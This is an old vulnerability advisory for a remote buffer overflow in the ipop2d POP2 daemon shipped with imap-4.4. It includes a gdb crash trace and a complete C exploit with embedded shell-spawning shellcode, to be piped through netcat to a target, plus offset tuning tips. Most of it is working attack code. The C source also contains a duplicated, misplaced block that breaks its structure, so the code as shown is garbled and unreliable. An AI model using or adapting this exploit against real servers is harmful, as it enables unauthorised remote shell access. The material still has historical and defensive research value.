ipop2d.txt

`Vulnerable Program: POP2 shipped with imap-4.4 package  
Platforms: Linux  
Impact: Remote users can spawn a shell with uid of user "nobody"  
Reported Initally: Chris Evans  
Exploit Code: bind <[email protected]>  
  
  
Details:  
--------  
POP-2 supports anonymous proxy service where remote users can connect to  
remote imap servers and login with a valid l/p. After authenticated with  
the imap server, the command "FOLD" with a buffer of 1002 will completely  
overwrite eip. Due to the fact that ipop2 sets the uid to nobody's you  
cannot spawn a rootshell :(  
  
.  
.  
(gdb) run  
+ POP2 localhost v4.46 server ready  
HELO localhost:b4h p4ssw0rd  
#0 messages in {localhost:143/imap/user=bind}INBOX  
FOLD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAA......................... (1002 'A's)  
  
Program received signal SIGSEGV, Segmentation fault.  
0x41414141 in ?? ()  
  
(gdb) info all-registers  
.  
.  
esp 0xbffff5ec 0xbffff5ec  
ebp 0x41414141 0x41414141  
esi 0xbffff605 -1073744379  
edi 0x80865ca 134768074  
eip 0x41414141 0x41414141  
.  
.   
  
Exploit Code:  
-------------  
  
Pipe output to netcat...  
  
/*  
* subipop2d.c (c) 1999 Subterrain Security  
*  
* Written by bind - June 18, 1999  
*  
* Vulnerable: ipop2 daemons shipped with the imap-4.4 package  
* Compromise: remote users can spawn a shell as user "nobody  
*  
* Greets: vacuum, xdr & cripto...  
*  
* Usage:  
* ./subipop2 <auth> <user> <pass> [offset] [alignment] [wait]  
*  
* Try offsets -500...500, alignment option should be between 0 and 4  
*  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
#define RET 0xbffff718  
#define NOP 0x90  
#define WAIT 20  
  
char shellcode[] = /* shellcode borrowed from plaguez's imapx.c */  
"\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80"  
"\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07"  
"\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"  
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f"  
"\x42\x49\x4e\x2f\x53\x48\x00";  
  
int main (int argc, char **argv)  
{  
char buf[1002], *auth, *user, *pass;  
int i, offset = 0, align = 0, timeout = WAIT;  
unsigned long addr;  
  
if (argc < 4)  
{  
printf ("usage: %s <auth> <user> <password> [offset] [alignment]"  
" [wait]\n",  
argv[0]);  
exit (1);  
}  
  
auth = argv[1];  
user = argv[2];  
exit (1);  
}  
  
auth = argv[1];  
user = argv[2];  
pass = argv[3];  
  
if (argc > 4) offset = atoi (argv[4]);  
if (argc > 5) align = atoi (argv[5]);  
if (argc > 6) timeout = atoi (argv[6]);  
  
addr = RET - offset;  
  
memset (buf, NOP, 1002);  
memcpy (buf + 500, shellcode, strlen (shellcode));  
  
for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4)  
*(long *) &buf[i] = addr;  
  
sleep (2);  
printf ("HELO %s:%s %s\n", auth, user, pass);  
sleep (timeout);  
printf ("FOLD %s\n", buf);  
  
}  
`